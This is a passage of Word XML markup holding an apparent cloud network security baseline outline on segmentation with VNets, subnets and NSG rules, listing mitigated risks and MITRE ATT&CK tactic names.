    <w:p w14:paraId="05B969D9" w14:textId="77777777" w:rsidR="00B63114" w:rsidRDefault="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C74F4D" w14:textId="77777777" w:rsidR="00B63114" w:rsidRPr="00650832" w:rsidRDefault="00B63114" w:rsidP="002C45CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14767794" w14:textId="30860E15" w:rsidR="002C45CF" w:rsidRPr="00650832" w:rsidRDefault="009C3A30" w:rsidP="00E2500D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc236841618"/>
      <w:r w:rsidRPr="00650832">
        <w:lastRenderedPageBreak/>
        <w:t>Network Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="37CE35BB" w14:textId="7B4A7642" w:rsidR="009C3A30" w:rsidRPr="00823F01" w:rsidRDefault="009C3A30" w:rsidP="00314EE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc236841619"/>
      <w:r w:rsidRPr="00823F01">
        <w:t>Apply network isolation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2C090C89" w14:textId="4053DDE9" w:rsidR="00773C1C" w:rsidRPr="00823F01" w:rsidRDefault="00773C1C" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc236841620"/>
      <w:r w:rsidRPr="00823F01">
        <w:t>NS-1: Establish network segmentation boundaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3FEF64DD" w14:textId="5372C8C7" w:rsidR="00773C1C" w:rsidRPr="005E43A5" w:rsidRDefault="00BF2D76" w:rsidP="00773C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7CA70A" w14:textId="52259D6C" w:rsidR="00BF2D76" w:rsidRPr="005E43A5" w:rsidRDefault="00BF2D76" w:rsidP="00BF2D76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separate Corpnet with Application networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12612D" w14:textId="75CDE48C" w:rsidR="00BF2D76" w:rsidRPr="005E43A5" w:rsidRDefault="00BF2D76" w:rsidP="00BF2D76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separate Application networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1EB865" w14:textId="7C123704" w:rsidR="00CF53A0" w:rsidRPr="005E43A5" w:rsidRDefault="00CF53A0" w:rsidP="00BF2D76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separate Production and Test Environment networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EE827" w14:textId="23A34D07" w:rsidR="00CF53A0" w:rsidRPr="005E43A5" w:rsidRDefault="00CF53A0" w:rsidP="00CF53A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00D1094A" w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B841885" w14:textId="3C830E09" w:rsidR="00CF53A0" w:rsidRPr="005E43A5" w:rsidRDefault="00E030B5" w:rsidP="00CF53A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Flat network exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CAD48A" w14:textId="56473170" w:rsidR="00E030B5" w:rsidRPr="005E43A5" w:rsidRDefault="00E030B5" w:rsidP="00CF53A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Privilege escalation pathways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19DC27" w14:textId="16270A20" w:rsidR="00E030B5" w:rsidRPr="005E43A5" w:rsidRDefault="00E030B5" w:rsidP="00CF53A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Malware propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887DA83" w14:textId="0E5F63B8" w:rsidR="00E030B5" w:rsidRPr="005E43A5" w:rsidRDefault="00E030B5" w:rsidP="00CF53A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>East-west traffic blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C80DF9" w14:textId="431A8DCA" w:rsidR="0018124E" w:rsidRPr="005E43A5" w:rsidRDefault="0018124E" w:rsidP="0018124E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50BD19" w14:textId="1DCFD911" w:rsidR="0018124E" w:rsidRPr="005E43A5" w:rsidRDefault="0018124E" w:rsidP="0018124E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mittre attack - Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508A0FE" w14:textId="03E4710A" w:rsidR="0018124E" w:rsidRPr="005E43A5" w:rsidRDefault="0018124E" w:rsidP="0018124E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mittre attack -Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644E900" w14:textId="5C5BD7D0" w:rsidR="006E4BB8" w:rsidRPr="005E43A5" w:rsidRDefault="006E4BB8" w:rsidP="0018124E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mittre attack -Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF10DA" w14:textId="302EA9C8" w:rsidR="006E4BB8" w:rsidRPr="005E43A5" w:rsidRDefault="006E4BB8" w:rsidP="0018124E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E43A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mittre attack -Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5610BE" w14:textId="77777777" w:rsidR="00CD73C1" w:rsidRDefault="00CD73C1" w:rsidP="00CD73C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFF4A9B" w14:textId="2ED7DA3A" w:rsidR="00CD73C1" w:rsidRPr="002B27F1" w:rsidRDefault="00CD73C1" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B27F1">
        <w:t>NS-1.1: Create segmentation using VNet and subnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A06E2F" w14:textId="0D22B8B7" w:rsidR="00076B5E" w:rsidRDefault="00076B5E" w:rsidP="005E43A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00076B5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Design VNet topology based on segmentation strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7E8D2" w14:textId="45F680E1" w:rsidR="00076B5E" w:rsidRDefault="00076B5E" w:rsidP="005E43A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00076B5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Isolate high-risk workloads</w:t>
      </w:r>
      <w:r w:rsidR="007A3B61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034DA15" w14:textId="3E1734F8" w:rsidR="00191A3D" w:rsidRPr="00191A3D" w:rsidRDefault="00191A3D" w:rsidP="007A3B61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identify workloads requiring strict isolation and deploy them into dedicated, isolated VNets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D484756" w14:textId="1EACACF8" w:rsidR="007A3B61" w:rsidRPr="007A3B61" w:rsidRDefault="007A3B61" w:rsidP="00191A3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3B61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>production databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D38254" w14:textId="52C71332" w:rsidR="007A3B61" w:rsidRDefault="00D53BEE" w:rsidP="00191A3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53BEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payment processing systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C24E2C" w14:textId="23EE50F1" w:rsidR="00BB7EAC" w:rsidRDefault="00BB7EAC" w:rsidP="005E43A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7EAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create subnets for granular segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2AE8D" w14:textId="25AAE1EA" w:rsidR="00D53BEE" w:rsidRDefault="00D53BEE" w:rsidP="00EF00E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF00E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Within each VNet, create distinct non-overlapping subnets to further segment the network based on application tiers</w:t>
      </w:r>
      <w:r w:rsidR="00EF00E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4927E" w14:textId="4BD14E68" w:rsidR="00EF00E3" w:rsidRDefault="00450EEF" w:rsidP="00450EEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450EEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8BDA2E" w14:textId="0B489AEB" w:rsidR="00450EEF" w:rsidRDefault="00450EEF" w:rsidP="00450EEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450EEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7399E749" w14:textId="5270507D" w:rsidR="00450EEF" w:rsidRDefault="00450EEF" w:rsidP="00450EEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450EEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255CA86" w14:textId="5D65F2D1" w:rsidR="002B27F1" w:rsidRPr="002B27F1" w:rsidRDefault="002B27F1" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B27F1">
        <w:t>NS-1.2: Restrict network traffic using NSG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D80C66" w14:textId="025680C9" w:rsidR="00D53BEE" w:rsidRDefault="00CE68AC" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE68AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identify communication requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC39A4" w14:textId="1FCE249A" w:rsidR="00226640" w:rsidRDefault="00226640" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Analyze resources in each VNet to understand their north-south (external) and east-west (internal) traffic communication needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00454D" w14:textId="1EC412BE" w:rsidR="00226640" w:rsidRDefault="00D40C14" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>documenting required ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7062956E" w14:textId="0084EA04" w:rsidR="00D40C14" w:rsidRDefault="00D40C14" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089004F2" w14:textId="31CF9238" w:rsidR="00D40C14" w:rsidRDefault="00D40C14" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>source addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D723D7" w14:textId="2B989475" w:rsidR="00D40C14" w:rsidRDefault="00D40C14" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
